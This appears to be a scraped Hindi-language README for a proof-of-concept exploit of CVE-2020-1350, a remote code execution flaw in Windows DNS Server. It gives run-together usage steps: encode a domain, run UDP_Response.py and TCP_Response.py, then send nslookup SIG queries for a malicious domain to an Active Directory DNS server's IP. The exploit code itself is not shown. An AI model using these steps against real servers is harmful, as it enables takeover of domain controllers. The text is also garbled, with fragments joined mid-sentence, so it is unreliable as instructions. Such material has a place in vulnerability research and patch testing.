
CVE-2020-1350 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Windows DNS सर्वर में एक महत्वपूर्ण दूरस्थ कोड निष्पादन भेद्यता। क्राफ्टेड DNS क्वेरी के माध्यम से शोषण प्रदर्शित करता है।
CVE-2020-1350 प्रमाण-अवधारणा
33y0re.com नाम दिया है)blah लंबाई 0x4 बाइट्स है और .net 0x3 बाइट्स है)domain_correct को \x04blah\03net\x00 पर सेट करेंpython UDP_Response.py और python TCP_Response.py चलाएँnslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP और उसके बाद: nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP